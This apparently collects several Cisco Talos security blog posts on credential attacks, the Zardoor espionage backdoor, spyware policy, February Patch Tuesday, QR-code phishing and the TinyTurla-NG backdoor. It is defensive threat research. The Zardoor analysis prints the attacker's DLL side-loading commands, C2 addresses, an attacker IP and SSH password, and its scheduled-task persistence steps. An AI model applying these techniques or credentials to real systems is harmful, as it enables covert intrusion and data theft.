The stealing of Kerberos tickets was the ninth most common MITRE ATT&CK technique Talos observed in 2023. Kerberos is a network authentication protocol that authenticates service requests and grants a ticket for a secure connection. In the case of bad actors, they will try and steal these tickets (or forge them) to enable unauthorized access.
Targeting dormant accounts
According to Oort data from 2022, dormant accounts represent almost a quarter of the average company’s total accounts, and these accounts are regularly targeted (over 500 times per month on average). Attackers will look for accounts that are not used regularly but still have network access (for example, an employee or a temporary contractor who left the company, but their access was never removed).
Infostealers
Infostealers, or information-stealing malware, appear frequently in Talos IR engagements. Infostealers can be used to gain access to any kind of sensitive information including financial details and even intellectual property. Most commonly, we see infostealers being used to access and collect user credentials.
Brute force attacks
If an attacker has part of the login details, they may try brute force techniques to try and repetitively guess the password. These may not necessarily be entirely random guesses, as attackers may use knowledge that has been gained from other attacks or leaks, such as the ones listed above. This highlights the need for organizations to limit the amount of consecutive failed logon attempts.
Password spraying
Password spraying is a specific kind of brute force attack, but instead of brute forcing a password on a single system, the actors will use passwords from information leaks. They will try them on popular web services in the hope that users will reuse their passwords. This highly reduces the chance of detection and password blocking.
QR code phishing
According to public reporting, there has been a recent rise in QR code phishing to gain user credentials. The Cisco Talos Incident Response team were recently called in to help with a such an incident where credentials were stolen. A phishing email was sent to the company email of several employees and the email contained a PDF with a malicious QR code. Some employees used their smartphone to scan the code which paved the way for the attacker to gain their credentials and log in to the organisation’s system. The exact reason as to why the attacker was able to obtain the credentials is unknown due to a lack of logs in the smartphone, but one reason could be that passwords were saved in an unpatched browser.
Going after the users
Some of the above techniques can be addressed by defender tools and configurations within the organization’s network environment which allow for the detection of unauthorized access. But since there are many identity-type attacks that seek to manipulate or coerce the user themselves, we also need to talk about how users are being targeted today.
I asked Talos’ Head of Outreach Nick Biasini about what his main recommendations were for the coming year. He spoke about the increased targeting of users and how adversaries are getting more relentless in their attempts to gain valid credential-based access to a system.
He mentioned that whilst the malware itself used to gain these credentials won’t necessarily be very sophisticated, it is more about the intensity of the attacks. Here’s his insights in full:
Phishing emails are one of the most common ways adversaries compromise victims (it was No. 3 in Talos’ list of initial access vectors for 2023 and has consistently been a top-ranked threat in Talos Incident Response findings for years). In the last year alone, 25% of the initial access vectors identified in Talos Incident Response engagements were comprised of phishing. This observation is consistent with U.S. government findings, with the FBI noting that phishing was the top incident reported to its Internet Crime Complaint Center (IC3) in 2022.
Most people think of phishing/social engineering as clicking on a malicious link and triggering malware. But there are deeper aspects to these attacks that can involve the manipulation of users to do bidding on behalf of threat actors. These are known as insider attacks.
Insider attacks
We still see cases of the traditional malicious insiders i.e. employees who deliberately want to cause damage to their organization’s network, either for financial gain, or frustrations with the organization itself. But increasingly we are seeing another category of insider attacks – the “unwitting assets.”
In the case of the unwitting asset, threat actors use social engineering to leverage the user to act on their behalf, typically through some form of manipulation.
A common example is when an adversary concocts a story that implicates the user in some way, or there’s a problem that needs solving quickly. Adversaries, especially more sophisticated ones, will often ask for the target to get on a phone call to discuss the issue further.
Once the attacker has someone on the phone, they unfortunately stand more of a chance of persuading the user to do the adversary’s bidding. This could include logging into devices and reconfiguring something or revealing important account details.
Recommendations
Identity related attacks are challenging to defend against. You’re dealing with the misuse of valid credentials. Finding the genuine source of them is especially difficult if users are being coerced to share their account details or conduct malicious activities. However, there are some practices we recommend that can help:
Limit the amount of access a user has – no more than is required for them to perform their job.
Limit the amount of consecutive failed login attempts to prevent possible brute force access.
Ensure you are using MFA across your network.
For IT administrators, ensure you are set up to inspect laterally across the network. Not just inspecting traffic going north/south. This will help prevent attackers who are trying to move laterally.
Have a defense-in-depth approach, so that if a portion of your defense fails, other defenses can detect anomalies and intrusions.
Conduct routine auditing and ensure dormant accounts are deleted from the network. This will help prevent attackers using dormant accounts to try to gain access undetected. It’s also common for accounts to be set up to test new systems, so ensure these test accounts are only temporary. Set up an automated procedure for test accounts to be disabled at the end of the project.
Additionally, disable the accounts of those who have left your organization and ensure you remove their remote access (i.e., through the VPN).
Have a checks and balances system in place for dealing with financial transactions so that no single person can initiate and complete a wire transfer without additional approval. This can help mitigate social engineering attacks against users who deal with payments.
Addressing the abuse of valid credentials involves a comprehensive set of security measures. Consider a zero-trust architecture approach which validates every user connection to every device and every application. This will help prevent threat actors operating under the radar and across your network with stolen credentials.
And finally, we would recommend organizations to consider actively hunting for evidence of incursion. As well as finding possible breaches, you may also detect areas where your overall network security could be improved. You can read more about this in our blog “Beyond the basics: Implementing an active defense.”
Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.”
We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years.
Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence.
At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can assess the relations of the new threat actor with the existing groups only with low confidence, as open-source tools can be used by any threat actor. The choice of the compromised target does not align with the known objectives of any known threat actors originating from China.
Talos discovered an ongoing espionage campaign in May 2023 targeting an Islamic charitable non-profit organization in Saudi Arabia that exfiltrates data approximately twice a month.
The initial access vector is unknown, however, we observed the threat actor executing a malware we are calling the “Zardoor” backdoor to gain persistence. Then we observed the threat actor establishing C2 using open-source reverse proxy tools such as Fast Reverse Proxy (FRP), sSocks and Venom, a reverse proxy socks5 server-client tool originally developed for penetration testers.
The threat actor customized sSocks to remove dependencies on Visual C Runtime libraries so these tools would rely only on WinAPI libraries and therefore could be executed without unexpected runtime errors.
Once a connection was established, the threat actor used Windows Management Instrumentation (WMI) to move laterally and spread the attacker's tools — including Zardoor — by spawning processes on the target system and executing commands received from the C2, as seen in the commands below.
Execution flow of the Zardoor backdoor
To maintain persistence, the attacker deployed a previously unseen backdoor family we have named Zardoor, which we named based on the file names “zar32.dll” and “zor32.dll”. “Zar32.dll” is the main backdoor component that communicates with the attacker’s C2, and “zor32.dll” ensures “zar32.dll” has been properly deployed with admin privileges. Talos could not obtain a file sample for the dropper used in this specific campaign. However, we found and analyzed other available samples with an execution sequence and filenames identical to the malicious activity we observed and possibly related to the attack we observed.
Based on our analysis of these matching samples, the execution sequence has two parts:
The dropper installs and executes the malicious “oci.dll”
The main purpose of this dropper is to configure “msdtc.exe” to load the malicious “oci.dll” payload. Depending on the target OS architecture, the dropper locates either a 32- or 64-bit “oci.dll” and drops it in the system file path C:\Windows\System32\. Then, the dropper will attempt to stop the MSDTC service and use “msdtc.exe” to help register the malicious “oci.dll” with admin privileges, using the command msdtc -install.
However, if the MSDTC service fails to stop, the dropper patches the binary of the malicious “oci.dll” file to remove the strings 1ISSYSTEM and 1ISAUTORUN, and save the patched DLL to the file path, %TEMP%\win_oci_41aa0d5.dll. Removing the strings will later help determine where to save “zar32.dll” and “zor32.dll” on the victim’s computer.
The threat actor then uses Rundll32 to execute the patched “oci.dll” using this command: C:\Windows\System32\rundll32.exe %TEMP%\win_oci_41aa0d5.dll MainEntry. This patched “oci.dll” will extract “zar32.dll” and “zor32.dll” into the Temp Directory, and launch “zar32.dll MainEntry” using “rundll32.exe”. The MSDTC service will register the malicious “oci.dll” with the msdtc -install command.
If either of these two actions is successful, the dropper configures the MSDTC service to load “oci.dll” and the DLL will be executed. Finally, a cleanup batch script is created and saved to the location %TEMP%\xz330ksdfg.bat. The batch script deletes the dropper and then deletes itself.
Malicious “oci.dll” payload
The malicious loader “oci.dll” contains the backdoor payloads, “zar32.dll” and “zor32.dll” in the resource section. Oci.dll contains two exported functions: ServiceMain() to launch the backdoor module (“zar32.dll”) and DllEntryPoint() to drop the backdoor onto the victim’s machine.
The ServiceMain() export is executed by the MSDTC service and launches the export function MainEntry of “zar32.dll” using “rundll32.exe.”
The DllEntryPoint() function calls the DLLMain function, which determines where to dump “zar32.dll” and “zor32.dll”. This occurs by searching for the strings 1ISSYSTEM and 1ISAUTORUN. If the string 1ISSYSTEM is found in “zar32.dll”, DLLMain drops “zar32.dll” and “zor32.dll” into the System32 directory.
If the string 1ISSYSTEM is not found, then DLLMain will look up the string 1ISAUTORUN, and if it exists, DLLMain will drop “zar32.dll” and “zor32.dll” into the %userprofile% directory. If neither of the strings are found, DLLMain will drop “zar32.dll” and “zor32.dll” into the “%TEMP%” directory. After the payloads are saved, the DLLs and their export function 'MainEntry()' are launched by “rundll32.exe”.
To execute “zar32.dll”, the “oci.dll” export “ServiceMain()” is executed by “msdtc.exe” which then loads “zar32.dll” using the command: rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry. “Zor32.dll” is subsequently loaded from the same exported method with the command rundll32.exe C:\WINDOWS\system32\zor32.dll MainEntry.
Analysis of the “zar32.dll” and “zor32.dll” backdoor files
“Zar32.dll” is an HTTP/SSL remote access tool (RAT) that is capable of sending encrypted data to the attacker’s C2, executing PE payloads in fileless mode, searching for Session IDs, remote shellcode execution, and updating the C2 IP/hostname or port in memory. “Zar32.dll” contains a hardcoded debug symbol path seen below, and has two export functions: MainEntry() and DllEntryPoint.
Once deployed, “zar32.dll” creates three mutexes with the names, 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, ThreadMutex12453, and rrx_%d, where the value of %d is a random seed that is based on the DLLs’ time of execution. If the mutex 3e603a07-7b2d-4a15-afef-7e9a0841e4d5 already exists, the DLL will exit because that indicates “zar32.dll” is successfully running.
To establish a C2 connection, “zar32.dll” needs a program that allows network applications to operate through a SOCKS or HTTPS proxy. The DLL connects to the following URLs:
1.0.0[.]1/index.html
1.0.0[.]2/index.html
1.0.0[.]3/index.htm
The IP addresses are used by Cloudflare DNS services, including the DNS over HTTPS and the communication to these IP addresses may indicate the attempt to bypass the DNS-based detections to attacker-controlled C2 servers.
“Zar32.dll'' attempts to connect to its C2 server using SSL with the following HTTP User-Agents:
64-bit application: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; Trident/7.0; rv:11.0) like Gecko
32-bit application on 64-bit OS: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; WOW64; Trident/7.0; rv:11.0) like Gecko
Once a connection is successfully established, “zar32.dll” supports the following C2 commands:
Encrypt and send data to C2.
Execute remotely fetched PE payload.
Search for session ID.
(Plugin exit).
Remote shellcode execution.
Delete this RAT.
Update C2 IP (IP/domain_name:port).
Do nothing.
We continued to observe several dependencies in the malware’s execution routine. If “zar32.dll” is running when “zor32.dll” is installed, “zor32.dll” will install the “msdtc.exe” service installer.
If “zar32.dll” is not running when “zor32.dll” is installed, then “zor32.dll” starts the “msdtc.exe” service and attempts to create a mutex with the name 6c2711b5-e736-4397-a883-0d181a3f85ae.
Next, “zor32.dll” will check if the “oci.dll” file exists and finish the execution if it does not. If “oci.dll” exists, “zor32.dll” attempts to create another mutex with the name 3e603a07-7b2d-4a15-afef-7e9a0841e4d5. The DLL will exit if the mutex exists, indicating“zar32.dll” is successfully running.
We also identified “zor32.dll” performing checks to maintain persistence if the process has admin privileges using the following procedures:
If the MSDTC service is not running, “zor32.dll” will configure the MSDTC service with the command msdtc -install. If the installation fails, it will keep attempting up to 10 times.
“zor32.dll” attempts to query MSDTC service status and if this fails, it will attempt up to 10 times.
If the MSDTC service is running, then “zor32.dll” will attempt to stop it. If this fails, it will keep attempting to install up to 10 times.
If the MSDTC service is not running, “zor32.dll” will start the service.
Scheduled tasks to maintain persistence
For persistence, the threat actor registers their reverse proxies as scheduled tasks, causing the reverse proxy to execute approximately every 20 minutes to communicate with the attacker’s C2 servers. To achieve this, first, the threat actor confirms if the victim already has scheduled tasks running with the names "KasperskySecurity" or "Microsoft Security Essentialss." Then, the attacker deletes the legitimate scheduled task and creates a new one with the same name for the proxy “msbuildss.exe”.
Talos observed the threat actor in July 2023 storing the remote server’s public key for future tasks. This helps the threat actor to access the remote (Secure Shell) SSH server and set up remote port forwarding, allowing remote servers and devices on the internet to access devices that are on a private network.
The attacker downloads the private SSH key and saves it to the file path c:\users\[Redacted]\.ssh\ with the filename “id_rsa.” The threat actor also saves the file “known_hosts”, containing the public keys hosts that can be accessed using the private key stored in “id_rsa”.
According to the above commands, the threat actor first downloads and checks the contents of the file “2.vbs” to ensure it is the script they would like to execute. The “2.vbs” file is responsible for setting up the SSH remote port forwarding from port 443 on the victim’s device to port 22 on the attacker’s server using the user name root. The file makes sure it has successfully set up the SSH forwarding server by performing the following steps:
netstat -ano | findstr 70.34 is used to find part of the remote IP address 70[.]34[.]208[.]197.
The executable “shd.exe” initiates an SSH connection using the username root and the password "3My[{BK)Ni8a".
Look for a port 443 connection on the victim’s device and kill “ssh.exe” and “shd.exe” using the taskkill utility.
Reverse proxy tools used by the threat actor
As opposed to forward proxies, used to connect devices on the private network to internet services, usually HTTP-based. Reverse proxies allow a computer connected to the internet to create a tunnel and allow remote access to services on the local private network.
Reverse proxies are often used as legitimate load balancers in complex system and application architectures. However, malicious actors are using them to establish communications with otherwise unreachable systems such as RDP servers, domain controllers, files or database servers.
Fast Reverse Proxy (FRP)
Fast Reverse Proxy (FRP) is a reverse proxy tool that can be used to make network services, often located behind a NAT or firewall, remotely accessible. FRP consists of two main components: the FRP client and the FRP server. The FRP client is responsible for forwarding local requests to the FRP server, which in turn redirects them to the internet. This allows applications running on devices behind the NAT or firewall to be accessible from the outside network.
7000 is the default port used by the FRP server components. However, these ports can be configured per the user's needs. A basic setup involves installing the FRP server on a public server with a public IP, and the FRP client on the machine you want to expose. The client and server are configured via respective INI configuration files. Once the client and server are appropriately configured and started, services on the client's machine will be accessible via the server's public IP and the specified ports.
Fast Reverse Proxy (FRP) has been reported to be used by several, predominantly Chinese threat actors to bypass network security measures and maintain persistence within a compromised network. By leveraging FRP, these threat actors can create a tunnel from a machine within the compromised network to an external server under their control. This allows them to exfiltrate data, deploy additional malicious tools, or carry out other activities while evading detection.
The usage of FRP, a legitimate and widely-used tool, makes the malicious traffic harder to distinguish from the normal network traffic, thereby increasing the stealthiness of the attack. However, the presence of an FRP client in the environment may be a good indicator of potential compromise of the network where FRP is not typically used.
FRP is a popular tool and has been increasingly used by threat actors, based on the increase in VirusTotal submissions of FRP tools over the past few years.
Venom proxy
Venom is a multi-hop proxy designed for red teaming and pentesting written in the Go language. It allows the user to create a network of proxy nodes that can act as an admin or agent. The agent connects to either another agent or the admin node. The user controls the network through the control of the administration node and can easily add additional agents to the network.
Venom allows the user, which could also be a malicious actor, to create a botnet of proxies that can be used to remotely control the nodes, exfiltrate data, install additional payloads, etc.
The Venom features are:
Multi-hop socks5 proxy.
Multi-hop port forwarding.
SSH tunneling.
Interactive shell.
Uploading and downloading files.
Network traffic encryption.
Support of multiple platforms (Linux/Windows/MacOS) and multiple architectures (x86/x64/ARM/MIPS).
Other reverse proxy tools and their usage by threat actors
In addition to FRP and Venom, threat actors, predominantly originating from China, based on the previous Talos research and available open-source threat intelligence use several other tools supporting reverse proxying, most commonly:
We have also created a matrix that displays the active threat groups and the proxy tools they are using. Talos assesses with low confidence that the existence of one or more of the tools on a compromised system may indicate the activity of a particular group, as these tools are easily reusable and can be employed by any malicious actor.
Zardoor attacks conducted by an advanced threat actor
Talos assesses this campaign was conducted by an unknown and advanced threat actor. We have not been able to attribute this activity to any known, publicly reported threat actor at this time, as we have not found any overlap between the observed tools or C2 infrastructure used in this campaign.
The threat actor appears highly skilled based on their ability to create new tooling, such as the Zardoor backdoors, customize open-source proxy tools, and leverage several LoLBins including “msdtc.exe” to evade detection. In particular, side-loading backdoors contained in “oci.dll” via MSDTC is a very effective method of remaining undetected while maintaining long-term access to a victim’s network.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 61913, 61914 and 62371 - 62380.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
Win.Backdoor.Zardoor-10019732-0
Win.Backdoor.ZardoorVMP-10019731-0
Win.Backdoor.sSocksProxy-10019733-0
Win.Backdoor.VenomProxy-10019734-0
MITRE ATT&CK Techniques
Command and Control
T1090.003 Proxy: Multi-hop Proxy
T1105 Ingress Tool Transfer
DiscoveryT1018 Remote System DiscoveryT1033 System Owner/User
DiscoveryT1049 System Network Connections Discovery
Private and public efforts to curb the use of spyware and activity of other “mercenary” groups have heated up over the past week, with the U.S. government taking additional action against spyware users and some of the world’s largest tech companies calling out international governments to do more.
The illegal use of spyware to target high-profile or at-risk individuals is a global problem, as highlighted by this article from The Register that Talos’ Nick Biasini just contributed to. This software can often track targets’ exact location, steal their messages and personal information, or even listen in on phone calls. And as we’ve written about, many Private Sector Offensive Actors (PSOAs) are developing spyware and selling it to whoever is willing to pay, regardless of what their motives are.
A group of nations including the U.S., U.K. and France, along with several Fortune 500 tech companies, signed an agreement Tuesday to work to limit the use of spyware across the globe and crack down harder on bad actors who are illegally selling and using the software. However, the language of the resolution seemed closer to aspirations than actual action.
For their part, the U.S. did roll out new restrictions on the visas of any foreign individuals who misuse commercial spyware. The restrictions could also affect anyone who makes the spyware, profits off its sale or facilitates the sale of the technology.
These are all positive steps in the right direction toward curbing the use and sale of commercial spyware, but I remain concerned that the tendrils of spyware are too deep in the security landscape at this point that we’ll be dealing with this issue for years to come.
Google’s security research group recently found that 20 of the 25 zero-day vulnerabilities Google TAG discovered that were being exploited in the wild in 2023 were exploited by commercial spyware vendors. In the same report, Google TAG said it was actively tracking at least 40 commercial spyware vendors — all with an unknown number of customers, users, creators and employees.
The general tenants of spyware are all around us, too. While not traditional commercial spyware that’s tracking journalists or dissidents, even just quiet trackers are being used all over the internet.
A report from 404 Media last month found that the apps of several popular sites like the 9gag forum and Kik messaging app were part of a massive network of ad tracking. Reporters found that ads inside each app are sending information to a powerful mass monitoring tool, which is then advertised and sold to national security agencies. This information can quietly build profiles out of users that could be used in many ways (though hopefully just for targeted ads, in the absolute best-case scenario), including tracking their hobbies, family members and physical location.
Just as with ransomware, the problem of addressing spyware and PSOAs is going to take an international, public-private effort, and it certainly won’t be solved overnight. But I believe it will take more than good faith resolutions to change the way our internet activity is tracked, and how attackers can exploit that in a worst-case scenario.
One such way we can start taking steps to immediately curb the spread of spyware is with greater communication. Talos encourages any organization, public or private, to publicly share actionable information or detection content related to spyware discovered in the wild. Public disclosure is often limited in the number of technical details of how the spyware itself works or does not contain many IOCs.
If readers suspect their system(s) may have been compromised by commercial spyware or hack-for-hire groups, please consider notifying Talos’ research team at [email protected] to assist in furthering the community’s knowledge of these threats.
The one big thing
Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family named “Zardoor.” Talos believes an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years. In at least one attack, the actors have infected an Islamic charitable non-profit organization in Saudi Arabia, often exfiltrating data multiple times in a month.
Why do I care?
At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be other victims that we don’t know about yet. This also is the work of a yet-to-be-discovered threat actor, as Talos cannot pin the exact TTPs onto a known threat actor. Zardoor is a dangerous backdoor that can remain undetected for extended periods, and without a ton of prior information about this actor, it’s tough to predict where they might pivot next.
So now what?
Talos has released new ClamAV signatures and Snort rules to protect against Zardoor and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this backdoor.
Top security headlines of the week
Adversaries are actively exploiting three vulnerabilities in Ivanti’s VPN software, including one newly discovered over the weekend. Ivanti first disclosed two vulnerabilities on Jan. 22 affecting Ivanti’s Connect Secure and Policy Secure VPN products. Eventually, attackers took notice and started targeting unpatched instances of the software. Shortly after disclosure, the U.S. Cybersecurity and Infrastructure Security Agency only gave federal agencies 48 hours to disconnect any devices that used the affected software. Patches are now available for the three vulnerabilities, and users are encouraged to update as soon as possible. The CISA directive said that “agencies running the affected products must assume domain accounts associated with the affected products have been compromised” and said that agencies should reset “passwords twice for on premise [SIC] accounts, revoke Kerberos tickets, and then revoke tokens for cloud accounts in hybrid deployments” by March 1. It also said, “for cloud joined/registered devices, disable devices in the cloud to revoke the device tokens.” The newest vulnerability, CVE-2024-21893, is a server-side request forgery that could allow an attacker to access certain restricted resources without authentication. (Ars Technica, Decipher)
Apple addressed a security issue early in the life of their newly released Apple Vision Pro, a mixed-reality headset. Days after initial reviews for the product were published, Apple released its first security update for the headset, saying that a vulnerability in the WebKit browser engine “may have been exploited” in the wild. The vulnerability, CVE-2024-23222, also affects other Apple operating systems, including iOS and iPad OS. Vision Pro users also discovered that, before the software patch, they could not reset the password on their device without physically bringing the headset to a retail Apple store. The passcode, typically a series of digits for the headset, could only be reset if the users gave the physical device to Apple support or mailed it to AppleCare. However, Apple added the ability to reset the devices’ passcode in the same patch that fixed the aforementioned vulnerability. (TechCrunch, Bloomberg)
Microsoft followed up one of the lightest recent Patch Tuesdays in January with a large release of vulnerabilities on Tuesday, although still far from numbers seen in the past.
In all, February’s security update from Microsoft includes 75 vulnerabilities, three of which are considered critical. There are 69 “important” vulnerabilities, according to Microsoft, and three that are of “moderate” severity.
Although considered of moderate risk, one of the vulnerabilities is being actively exploited in the wild — CVE-2024-21351, a security feature bypass vulnerability in Windows SmartScreen. “Smart screen” protects users from malicious websites and files downloaded from the internet. Exploiting this vulnerability may allow a user to be tricked into downloading and executing a file from the internet without the traditional SmartScreen protections. There were no zero-day vulnerabilities disclosed in last month’s Patch Tuesday.
Of the three critical vulnerabilities, one (CVE-2024-20684) could allow an attacker that controls a Hyper-V guest to cause a denial-of-service attack on the host and, as a consequence, to all other guests of the same host.
CVE-2024-21357 is another critical remote code execution vulnerability in a multicast network protocol called Windows Pragmatic General Multicast. The vulnerability could, in theory, allow an attacker on the same network to execute code on other systems on that network. Microsoft considers the vulnerability exploitation complex, however, the company does list it as “more likely” to be exploited.
The third critical vulnerability (CVE-2024-21380) is an information disclosure vulnerability in Microsoft Dynamics Business Central/NAV. According to Microsoft, the exploitation of this attack requires user interaction, and the attacker must first win a race condition. Therefore, it’s considered to be a more complex attack and “less likely” to be exploited.
Cisco Talos would also like to highlight CVE-2024-21378, a remote code execution vulnerability in Microsoft Outlook. However, according to the advisory, this requires the attacker to be on the same network as the targeted machine and trick the victim into opening a specially crafted file or email.
CVE-2024-21379 is also a remote code execution vulnerability, this time in Microsoft Word. Exploiting this vulnerability requires an attacker to send to a victim a specially crafted Word document that, when opened, would allow remote code execution in the victim’s system.
The advisory contains 26 other remote code execution vulnerabilities that are considered “less likely” to be exploited. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63000 - 63001, 63004, 63005, 62992 - 62994, 62998 and 62999. There are also Snort 3 rules 300822 - 300826.
Though QR codes were once on the verge of extinction, many consumers are used to seeing them in the wild for ordering at restaurants, or as mainstays on storefront doors informing customers how they can sign up for a newsletter or score a sweet deal.
The use of QR codes saw a resurgence during the COVID-19 pandemic as a non-contact way for consumers to obtain important information. And as they’ve become more prevalent, attackers have taken notice, too, increasingly deploying them in phishing and email-based attacks.
There was a significant increase in QR code phishing in 2023, according to public reporting and recently collected data from Cisco Talos Incident Response (Talos IR).
As highlighted in our latest Quarterly Trends report, Talos IR responded to a QR code phishing campaign for the first time in an engagement in the fourth quarter of 2023, where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their personal mobile devices, thereby leading to malware being executed on the mobile devices.
In a separate attack, the adversaries sent targets spear-phishing emails with malicious QR codes pointing to fake Microsoft Office 365 login pages that eventually steal the user’s login credentials when entered.
QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after.
How is a QR code lure different from a traditional malicious attachment or link?
“Traditional” phishing attacks usually involve an adversary writing a highly targeted email hoping to trick a user into opening a malicious attachment or link that points to an attacker-controlled page.
Phishing emails, such as business email compromise, are usually meant to impersonate an individual or organization the target is familiar with and willing to open something like a Microsoft Word document or URL that they would normally trust.
These are typically links included in the body of an email, hyperlinked to a few words of text, or attachments to the emails with text prompting the user to open the attachment.
In the case of QR code attacks, the adversary embeds a QR code in the body of the phishing email and asks the target to scan it with a mobile device to open a specific attachment or web link. As with any other QR code, the target would have to use a QR code scanning app on their mobile device or the built-in scanning functions on native camera apps to open the requested link.
What’s on the end of these QR codes varies greatly. Attackers could use the QR code to point to an attacker-controlled web page that looks like a legitimate login page, but instead steals the user’s credentials when they go to log in. Or it can lead to a malicious attachment that eventually installs malware on the target’s device.
What makes the use of QR codes in attacks so dangerous?
Many corporate-owned computers and devices will have built-in security tools designed to detect phishing and preventing users from opening malicious links. However, when a personal device is introduced to the equation, these tools are no longer effective.
When the target uses their personal device to scan a malicious QR code, the attack surface shifts, as enterprise security protocols and monitoring systems have less control and visibility over personal devices. And not all email security solutions can detect malicious QR codes like they would with malicious email attachments.
With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices, making these attacks more likely. According to the 2023 Not (Cyber) Safe for Work Report, which is a quantitative survey performed by the cybersecurity firm Agency, 97 percent of respondents access their work accounts from their personal devices. This potentially exposes sensitive business information in QR code attacks, should adversaries be able to capture internal login credentials or downloaded files on the targeted device.
Prevention
To defend against QR code-based phishing attacks, users and organizations should follow several pieces of advice:
Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information. Cisco Umbrella’s DNS-layer security is available for personal Android and iOS devices, which provides defenders with additional visibility while protecting the privacy of mobile device code scanningwners.
An email security solution, such as Cisco Secure Email, can detect these types of attacks. Secure Email specifically recently added new QR code detection capabilities in which the URLs are extracted from QR codes and analyzed just as any other URL included in an email would be.
User education is at the core of preventing QR code-based phishing attacks. Executives and defenders should ensure all employees are educated on the dangers of phishing attacks and adversaries’ increasing use of QR codes in malicious emails.
Malicious QR codes may have poor image quality or look blurry when embedded in an email. This could be an initial sign that the QR code is not legitimate.
QR code scanners will often provide a preview of the link the code is pointing to. Inform users that they should only be visiting trusted web pages with URLs they recognize. Alternatively, they could use their managed device to manually type in the desired destination URL instead of using the QR code as a navigation method.
Look for common red flags in phishing emails, such as typosquatted email addresses and typos or grammatical errors in the body text of the email.
Never give out personal information unless you’ve confirmed the legitimacy of a QR code with the organization in question.
Using multi-factor authentication protocols such as Cisco Duo can prevent credential stealing, which often provides threat actors with an initial foothold into targeted systems to send more convincing phishing emails from trusted business associates or teammates.
Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.
Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.
TinyTurla-NG was seen as early as December 2023 targeting a Polish non-governmental organization (NGO) working on improving Polish democracy and supporting Ukraine during the Russian invasion.
We’ve also discovered previously unknown PowerShell scripts we’re calling “TurlaPower-NG '' that are meant to act as file exfiltrators. TinyTurla-NG deployed these scripts to exfiltrate key material used to secure the password databases of popular password management software, indicating a concerted effort for Turla to steal login credentials.
Talos, in cooperation with CERT.NGO, investigated another compromise by the Turla threat actor, with a new backdoor quite similar to TinyTurla, that we are calling TinyTurla-NG (TTNG). Our findings indicate that Polish non-governmental organizations (NGOs) are actively being targeted, with at least one of them supporting Ukraine. While NGOs aren’t directly involved in conflicts they frequently participate in providing aid to entities suffering through the conflicts. Aggressor parties may deem it strategically beneficial to monitor such NGOs to keep track of ongoing and potentially new aid packages for their victims.
Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded its arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs. This activity signals the adversary’s intention to expand both their suite of malware as well as a set of targets to support Russia’s strategic and political goals.
Talos identified the existence of three different TinyTurla-NG samples, but only obtained access to two of them. This campaign’s earliest compromise date was Dec. 18, 2023, and was still active as recently as Jan. 27, 2024. However, we assess that the campaign may have started as early as November 2023 based on malware compilation dates.
